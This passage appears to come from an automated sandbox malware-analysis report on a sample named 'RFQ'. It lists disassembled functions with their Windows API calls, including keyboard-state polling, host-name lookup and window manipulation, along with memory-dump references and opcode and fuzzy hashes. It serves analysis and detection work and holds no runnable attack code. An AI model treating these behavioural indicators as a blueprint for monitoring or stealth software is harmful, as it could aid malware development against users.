                                                                                                                                                    • Sleep.KERNEL32(000000FA), ref: 0077785D
                                                                                                                                                    • IsWindow.USER32 ref: 00777869
                                                                                                                                                    • EndDialog.USER32(00000000), ref: 0077787A
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.2131564960.0000000000731000.00000020.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true
                                                                                                                                                    • Associated: 00000000.00000002.2131549855.0000000000730000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131611471.00000000007BD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131611471.00000000007DE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131649434.00000000007EA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131664822.00000000007F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_730000_RFQ.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: Window$MessageSendSleepTimetime$ActiveDialogEnumFindThreadWindows
                                                                                                                                                    • String ID: BUTTON
                                                                                                                                                    • API String ID: 1194449130-3405671355
                                                                                                                                                    • Opcode ID: c4e0e5cda2444b68cb8e2bd0ca7a10bf6ac6f17d5b8047cf3e5e53693bb1198d
                                                                                                                                                    • Instruction ID: 6c5757993ba21f31508bfb4e9a8984a41d1da09a0d82ba7215f15b1f4075e3db
                                                                                                                                                    • Opcode Fuzzy Hash: c4e0e5cda2444b68cb8e2bd0ca7a10bf6ac6f17d5b8047cf3e5e53693bb1198d
                                                                                                                                                    • Instruction Fuzzy Hash: 66214FB0204205AFEB299B30EC8DF363F69FF44389B00C134F51986162EB7D5D10DA69
                                                                                                                                                    Function 007802EE Relevance: 18.3, APIs: 12, Instructions: 282comCOMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                      • Part of subcall function 0073936C: __swprintf.LIBCMT ref: 007393AB
                                                                                                                                                      • Part of subcall function 0073936C: __itow.LIBCMT ref: 007393DF
                                                                                                                                                    • CoInitialize.OLE32(00000000), ref: 0078034B
                                                                                                                                                    • SHGetSpecialFolderLocation.SHELL32(00000000,00000000,?), ref: 007803DE
                                                                                                                                                    • SHGetDesktopFolder.SHELL32(?), ref: 007803F2
                                                                                                                                                    • CoCreateInstance.OLE32(007BDA8C,00000000,00000001,007E3CF8,?), ref: 0078043E
                                                                                                                                                    • SHCreateShellItem.SHELL32(00000000,00000000,?,00000003), ref: 007804AD
                                                                                                                                                    • CoTaskMemFree.OLE32(?,?), ref: 00780505
                                                                                                                                                    • _memset.LIBCMT ref: 00780542
                                                                                                                                                    • SHBrowseForFolderW.SHELL32(?), ref: 0078057E
                                                                                                                                                    • SHGetPathFromIDListW.SHELL32(00000000,?), ref: 007805A1
                                                                                                                                                    • CoTaskMemFree.OLE32(00000000), ref: 007805A8
                                                                                                                                                    • CoTaskMemFree.OLE32(00000000,00000001,00000000), ref: 007805DF
                                                                                                                                                    • CoUninitialize.OLE32(00000001,00000000), ref: 007805E1
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.2131564960.0000000000731000.00000020.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true
                                                                                                                                                    • Associated: 00000000.00000002.2131549855.0000000000730000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131611471.00000000007BD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131611471.00000000007DE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131649434.00000000007EA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131664822.00000000007F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_730000_RFQ.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: FolderFreeTask$Create$BrowseDesktopFromInitializeInstanceItemListLocationPathShellSpecialUninitialize__itow__swprintf_memset
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 1246142700-0
                                                                                                                                                    • Opcode ID: 606c9074b2f2b63b2136c1acce26b2842f0d572698eab91b50bcbd8b33138357
                                                                                                                                                    • Instruction ID: 877f9d138c6b7057235d1b78f9ae87b64f1c48d636632eee0c81e45fba9c4108
                                                                                                                                                    • Opcode Fuzzy Hash: 606c9074b2f2b63b2136c1acce26b2842f0d572698eab91b50bcbd8b33138357
                                                                                                                                                    • Instruction Fuzzy Hash: 52B1C775A00209AFDB14DFA4C888DAEBBB9EF48314B148469F909EB251D774EE45CB50
                                                                                                                                                    Function 00772E5B Relevance: 18.2, APIs: 12, Instructions: 185keyboardCOMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • GetKeyboardState.USER32(?), ref: 00772ED6
                                                                                                                                                    • SetKeyboardState.USER32(?), ref: 00772F41
                                                                                                                                                    • GetAsyncKeyState.USER32(000000A0), ref: 00772F61
                                                                                                                                                    • GetKeyState.USER32(000000A0), ref: 00772F78
                                                                                                                                                    • GetAsyncKeyState.USER32(000000A1), ref: 00772FA7
                                                                                                                                                    • GetKeyState.USER32(000000A1), ref: 00772FB8
                                                                                                                                                    • GetAsyncKeyState.USER32(00000011), ref: 00772FE4
                                                                                                                                                    • GetKeyState.USER32(00000011), ref: 00772FF2
                                                                                                                                                    • GetAsyncKeyState.USER32(00000012), ref: 0077301B
                                                                                                                                                    • GetKeyState.USER32(00000012), ref: 00773029
                                                                                                                                                    • GetAsyncKeyState.USER32(0000005B), ref: 00773052
                                                                                                                                                    • GetKeyState.USER32(0000005B), ref: 00773060
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.2131564960.0000000000731000.00000020.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true
                                                                                                                                                    • Associated: 00000000.00000002.2131549855.0000000000730000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131611471.00000000007BD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131611471.00000000007DE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131649434.00000000007EA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131664822.00000000007F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_730000_RFQ.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: State$Async$Keyboard
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 541375521-0
                                                                                                                                                    • Opcode ID: 9b8f31473de8704977d33bee2c8962a0e30f5190925db90e60038c7490d20be2
                                                                                                                                                    • Instruction ID: f4ff3f0a913f691a719ca97248deda35a3a782d8dc104069ce48ab3baeef5b72
                                                                                                                                                    • Opcode Fuzzy Hash: 9b8f31473de8704977d33bee2c8962a0e30f5190925db90e60038c7490d20be2
                                                                                                                                                    • Instruction Fuzzy Hash: 8051F920A0478869FF35EB648815BEABFB59F113C0F08C59DD5CA561C3DA9C9B8CC762
                                                                                                                                                    Function 0076ED02 Relevance: 18.2, APIs: 12, Instructions: 174COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • GetDlgItem.USER32(?,00000001), ref: 0076ED1E
                                                                                                                                                    • GetWindowRect.USER32(00000000,?), ref: 0076ED30
                                                                                                                                                    • MoveWindow.USER32(00000001,0000000A,?,00000001,?,00000000), ref: 0076ED8E
                                                                                                                                                    • GetDlgItem.USER32(?,00000002), ref: 0076ED99
                                                                                                                                                    • GetWindowRect.USER32(00000000,?), ref: 0076EDAB
                                                                                                                                                    • MoveWindow.USER32(00000001,?,00000000,00000001,?,00000000), ref: 0076EE01
                                                                                                                                                    • GetDlgItem.USER32(?,000003E9), ref: 0076EE0F
                                                                                                                                                    • GetWindowRect.USER32(00000000,?), ref: 0076EE20
                                                                                                                                                    • MoveWindow.USER32(00000000,0000000A,00000000,?,?,00000000), ref: 0076EE63
                                                                                                                                                    • GetDlgItem.USER32(?,000003EA), ref: 0076EE71
                                                                                                                                                    • MoveWindow.USER32(00000000,0000000A,0000000A,?,-00000005,00000000), ref: 0076EE8E
                                                                                                                                                    • InvalidateRect.USER32(?,00000000,00000001), ref: 0076EE9B
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.2131564960.0000000000731000.00000020.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true
                                                                                                                                                    • Associated: 00000000.00000002.2131549855.0000000000730000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131611471.00000000007BD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131611471.00000000007DE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131649434.00000000007EA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131664822.00000000007F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_730000_RFQ.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: Window$ItemMoveRect$Invalidate
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 3096461208-0
                                                                                                                                                    • Opcode ID: a48f1548d656002edd2e4d22a9af98e1ccd0aff2d50067e6b8b3bab1ed3cc03e
                                                                                                                                                    • Instruction ID: f3330fc836b944d800add88dbe7d59fde965b0e1db64545a50cea66c54b87624
                                                                                                                                                    • Opcode Fuzzy Hash: a48f1548d656002edd2e4d22a9af98e1ccd0aff2d50067e6b8b3bab1ed3cc03e
                                                                                                                                                    • Instruction Fuzzy Hash: EA513475B00205AFDB18CF68CD95FAEBBB5FB88704F148229F91AD7290E7759D048B14
                                                                                                                                                    Function 0074B73E Relevance: 18.2, APIs: 12, Instructions: 170timeCOMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                      • Part of subcall function 0074B9FF: InvalidateRect.USER32(?,00000000,00000001,?,?,?,0074B759,?,00000000,?,?,?,?,0074B72B,00000000,?), ref: 0074BA58
                                                                                                                                                    • DestroyWindow.USER32(?,?,?,?,?,?,?,?,?,?,00000000,?,?,?,?,0074B72B), ref: 0074B7F6
                                                                                                                                                    • KillTimer.USER32(00000000,?,00000000,?,?,?,?,0074B72B,00000000,?,?,0074B2EF,?,?), ref: 0074B88D
                                                                                                                                                    • DestroyAcceleratorTable.USER32(00000000), ref: 007AD8A6
                                                                                                                                                    • ImageList_Destroy.COMCTL32(00000000,?,00000000,?,?,?,?,0074B72B,00000000,?,?,0074B2EF,?,?), ref: 007AD8D7
                                                                                                                                                    • ImageList_Destroy.COMCTL32(00000000,?,00000000,?,?,?,?,0074B72B,00000000,?,?,0074B2EF,?,?), ref: 007AD8EE
                                                                                                                                                    • ImageList_Destroy.COMCTL32(00000000,?,00000000,?,?,?,?,0074B72B,00000000,?,?,0074B2EF,?,?), ref: 007AD90A
                                                                                                                                                    • DeleteObject.GDI32(00000000), ref: 007AD91C
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.2131564960.0000000000731000.00000020.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true
                                                                                                                                                    • Associated: 00000000.00000002.2131549855.0000000000730000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131611471.00000000007BD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131611471.00000000007DE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131649434.00000000007EA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131664822.00000000007F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_730000_RFQ.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: Destroy$ImageList_$AcceleratorDeleteInvalidateKillObjectRectTableTimerWindow
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 641708696-0
                                                                                                                                                    • Opcode ID: d6963773935109b72f14eb8b7ef91f708542c2c0b904ae5d5f367cdc2677ee22
                                                                                                                                                    • Instruction ID: ecc947f0d35de4968e601e821462128906899f80702fb32966f44c854d4faf3c
                                                                                                                                                    • Opcode Fuzzy Hash: d6963773935109b72f14eb8b7ef91f708542c2c0b904ae5d5f367cdc2677ee22
                                                                                                                                                    • Instruction Fuzzy Hash: 80616A30501601DFDB369F15D988B36B7B9FF96321F54862AE04686A60DB7CFC90CB88
                                                                                                                                                    Function 0074B40A Relevance: 18.1, APIs: 12, Instructions: 131COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                      • Part of subcall function 0074B526: GetWindowLongW.USER32(?,000000EB), ref: 0074B537
                                                                                                                                                    • GetSysColor.USER32(0000000F), ref: 0074B438
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.2131564960.0000000000731000.00000020.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true
                                                                                                                                                    • Associated: 00000000.00000002.2131549855.0000000000730000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131611471.00000000007BD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131611471.00000000007DE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131649434.00000000007EA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131664822.00000000007F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_730000_RFQ.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: ColorLongWindow
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 259745315-0
                                                                                                                                                    • Opcode ID: d508a057012982f84306eb09f971031497e9e26d488cb77189c39ba370b6a1e9
                                                                                                                                                    • Instruction ID: 1c276059935dc37fd9b086aca6702386f430f5eb3cc007a54f20a435bd8cd97e
                                                                                                                                                    • Opcode Fuzzy Hash: d508a057012982f84306eb09f971031497e9e26d488cb77189c39ba370b6a1e9
                                                                                                                                                    • Instruction Fuzzy Hash: 9A41B134000188AFDB305F2CD889FB93B66AB46731F198361FD658A1E6E738CD42DB21
                                                                                                                                                    Function 0077690B Relevance: 18.1, APIs: 12, Instructions: 113COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.2131564960.0000000000731000.00000020.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true
                                                                                                                                                    • Associated: 00000000.00000002.2131549855.0000000000730000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131611471.00000000007BD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131611471.00000000007DE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131649434.00000000007EA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131664822.00000000007F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_730000_RFQ.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: _wcscat_wcscpy$__wsplitpath$_wcschr
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 136442275-0
                                                                                                                                                    • Opcode ID: 255862feb7588c7c88ae20e18fa13b1cc32d76187eac5995bbc4afd1c58e31c4
                                                                                                                                                    • Instruction ID: af8802d1650ae98c391a8a7a40be8b6e9ee5dbae79f093316f0d057197b4f0be
                                                                                                                                                    • Opcode Fuzzy Hash: 255862feb7588c7c88ae20e18fa13b1cc32d76187eac5995bbc4afd1c58e31c4
                                                                                                                                                    • Instruction Fuzzy Hash: DA41307684521CAECF61DB90CC45DCF73BCEB44300F0081E6FA59A2055EA75ABE98FA0
                                                                                                                                                    Function 0077D76A Relevance: 17.7, APIs: 3, Strings: 7, Instructions: 180COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • CharLowerBuffW.USER32(007CDC00,007CDC00,007CDC00), ref: 0077D7CE
                                                                                                                                                    • GetDriveTypeW.KERNEL32(?,007E3A70,00000061), ref: 0077D898
                                                                                                                                                    • _wcscpy.LIBCMT ref: 0077D8C2
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.2131564960.0000000000731000.00000020.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true
                                                                                                                                                    • Associated: 00000000.00000002.2131549855.0000000000730000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131611471.00000000007BD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131611471.00000000007DE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131649434.00000000007EA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131664822.00000000007F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_730000_RFQ.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: BuffCharDriveLowerType_wcscpy
                                                                                                                                                    • String ID: all$cdrom$fixed$network$ramdisk$removable$unknown
                                                                                                                                                    • API String ID: 2820617543-1000479233
                                                                                                                                                    • Opcode ID: 7b39b32a82b37357cbd869fe60c8a22f65e1c0b35d921ac24b3983727508d86a
                                                                                                                                                    • Instruction ID: 2b166aaa6abce58aa974d76e6001cbff829714d0505c45af1e3f06db713933a9
                                                                                                                                                    • Opcode Fuzzy Hash: 7b39b32a82b37357cbd869fe60c8a22f65e1c0b35d921ac24b3983727508d86a
                                                                                                                                                    • Instruction Fuzzy Hash: D9519F31504340EFCB20EF14D885AAAB7B5FF84354F10C92DF59A572A2EB39ED45CA52
                                                                                                                                                    Function 0073936C Relevance: 17.6, APIs: 6, Strings: 4, Instructions: 145COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • __swprintf.LIBCMT ref: 007393AB
                                                                                                                                                    • __itow.LIBCMT ref: 007393DF
                                                                                                                                                      • Part of subcall function 00751557: _xtow@16.LIBCMT ref: 00751578
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.2131564960.0000000000731000.00000020.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true
                                                                                                                                                    • Associated: 00000000.00000002.2131549855.0000000000730000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131611471.00000000007BD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131611471.00000000007DE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131649434.00000000007EA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131664822.00000000007F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_730000_RFQ.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: __itow__swprintf_xtow@16
                                                                                                                                                    • String ID: %.15g$0x%p$False$True
                                                                                                                                                    • API String ID: 1502193981-2263619337
                                                                                                                                                    • Opcode ID: cf0066a395d66b2b7ed454f531e9d6853800453e093557c7856850ce47c79c93
                                                                                                                                                    • Instruction ID: dc901b310749fc80519b1683ffa13702b8caeb44dd67cbd645f1829634bff83c
                                                                                                                                                    • Opcode Fuzzy Hash: cf0066a395d66b2b7ed454f531e9d6853800453e093557c7856850ce47c79c93
                                                                                                                                                    • Instruction Fuzzy Hash: 064108B1504204DBEB24EB38D945FA9B3F4EF89310F20446AF549D71C2EABA9941CB61
                                                                                                                                                    Function 0079A1B6 Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 101windowCOMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • MoveWindow.USER32(?,?,?,000000FF,000000FF,00000000,?,?,000000FF,000000FF,?,?,static,00000000,00000000,?), ref: 0079A259
                                                                                                                                                    • CreateCompatibleDC.GDI32(00000000), ref: 0079A260
                                                                                                                                                    • SendMessageW.USER32(?,00000173,00000000,00000000), ref: 0079A273
                                                                                                                                                    • SelectObject.GDI32(00000000,00000000), ref: 0079A27B
                                                                                                                                                    • GetPixel.GDI32(00000000,00000000,00000000), ref: 0079A286
                                                                                                                                                    • DeleteDC.GDI32(00000000), ref: 0079A28F
                                                                                                                                                    • GetWindowLongW.USER32(?,000000EC), ref: 0079A299
                                                                                                                                                    • SetLayeredWindowAttributes.USER32(?,00000000,00000000,00000001), ref: 0079A2AD
                                                                                                                                                    • DestroyWindow.USER32(?,?,?,000000FF,000000FF,?,?,static,00000000,00000000,?,?,00000000,00000000,?,?), ref: 0079A2B9
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.2131564960.0000000000731000.00000020.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true
                                                                                                                                                    • Associated: 00000000.00000002.2131549855.0000000000730000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131611471.00000000007BD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131611471.00000000007DE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131649434.00000000007EA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131664822.00000000007F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_730000_RFQ.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: Window$AttributesCompatibleCreateDeleteDestroyLayeredLongMessageMoveObjectPixelSelectSend
                                                                                                                                                    • String ID: static
                                                                                                                                                    • API String ID: 2559357485-2160076837
                                                                                                                                                    • Opcode ID: 5b3a17ea0b52c7c1f3a4e0a36e0295aa623f3334b6c710ce0a3eb924bfea01ce
                                                                                                                                                    • Instruction ID: 9b09ed18541309f6d8eb1a590e9037e18e8e25f19aee7299c30e85d306c87e0d
                                                                                                                                                    • Opcode Fuzzy Hash: 5b3a17ea0b52c7c1f3a4e0a36e0295aa623f3334b6c710ce0a3eb924bfea01ce
                                                                                                                                                    • Instruction Fuzzy Hash: 3D316B31101219BBDF219FA4EC49FEA3B69FF49364F114314FA19A60A0D7399811DBA5
                                                                                                                                                    Function 00776F02 Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 72networkCOMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.2131564960.0000000000731000.00000020.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true
                                                                                                                                                    • Associated: 00000000.00000002.2131549855.0000000000730000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131611471.00000000007BD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131611471.00000000007DE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131649434.00000000007EA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131664822.00000000007F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_730000_RFQ.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: _wcscpy$CleanupStartup_strcatgethostbynamegethostnameinet_ntoa
                                                                                                                                                    • String ID: 0.0.0.0
                                                                                                                                                    • API String ID: 2620052-3771769585
                                                                                                                                                    • Opcode ID: 088d2a2c73de01a2669535ce89c5f0a878df1cf98620ad2fbd12cd9aca4a80fb
                                                                                                                                                    • Instruction ID: 36f3830ef634e71119d9ef1f8b6d2e59781106d42ce131bd9dd0ca404166ef25
                                                                                                                                                    • Opcode Fuzzy Hash: 088d2a2c73de01a2669535ce89c5f0a878df1cf98620ad2fbd12cd9aca4a80fb
                                                                                                                                                    • Instruction Fuzzy Hash: 9C11E771604215ABCF346B70AC4DEEA77BCEF44711F0081A5F50996081FFBC9E858664
                                                                                                                                                    Function 0075500E Relevance: 16.8, APIs: 11, Instructions: 257COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • _memset.LIBCMT ref: 00755047
                                                                                                                                                      • Part of subcall function 00757C0E: __getptd_noexit.LIBCMT ref: 00757C0E
                                                                                                                                                    • __gmtime64_s.LIBCMT ref: 007550E0
                                                                                                                                                    • __gmtime64_s.LIBCMT ref: 00755116
                                                                                                                                                    • __gmtime64_s.LIBCMT ref: 00755133
                                                                                                                                                    • __allrem.LIBCMT ref: 00755189
                                                                                                                                                    • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 007551A5
                                                                                                                                                    • __allrem.LIBCMT ref: 007551BC
                                                                                                                                                    • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 007551DA
                                                                                                                                                    • __allrem.LIBCMT ref: 007551F1
                                                                                                                                                    • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0075520F
                                                                                                                                                    • __invoke_watson.LIBCMT ref: 00755280
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.2131564960.0000000000731000.00000020.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true
                                                                                                                                                    • Associated: 00000000.00000002.2131549855.0000000000730000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131611471.00000000007BD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131611471.00000000007DE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131649434.00000000007EA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131664822.00000000007F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_730000_RFQ.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: Unothrow_t@std@@@__allrem__ehfuncinfo$??2@__gmtime64_s$__getptd_noexit__invoke_watson_memset
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 384356119-0
                                                                                                                                                    • Opcode ID: d5e017027a87c5018ad803d53256558374d4b82fb585307daa6d96de3ac92c4c
                                                                                                                                                    • Instruction ID: ae8ab49d9f75e54e4ee1abe73e694f50af7738b30cb34ad523f60a8c6dd0af4c
                                                                                                                                                    • Opcode Fuzzy Hash: d5e017027a87c5018ad803d53256558374d4b82fb585307daa6d96de3ac92c4c
                                                                                                                                                    • Instruction Fuzzy Hash: 9971C4B2A00F1AABE7149E78CC65B9A77A8BF00365F144229EC15D6681E7B8D94487D0
                                                                                                                                                    Function 00774DDD Relevance: 16.7, APIs: 11, Instructions: 189windowsleepCOMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • _memset.LIBCMT ref: 00774DF8
                                                                                                                                                    • GetMenuItemInfoW.USER32(007F1708,000000FF,00000000,00000030), ref: 00774E59
                                                                                                                                                    • SetMenuItemInfoW.USER32(007F1708,00000004,00000000,00000030), ref: 00774E8F
                                                                                                                                                    • Sleep.KERNEL32(000001F4), ref: 00774EA1
                                                                                                                                                    • GetMenuItemCount.USER32(?), ref: 00774EE5
                                                                                                                                                    • GetMenuItemID.USER32(?,00000000), ref: 00774F01
                                                                                                                                                    • GetMenuItemID.USER32(?,-00000001), ref: 00774F2B
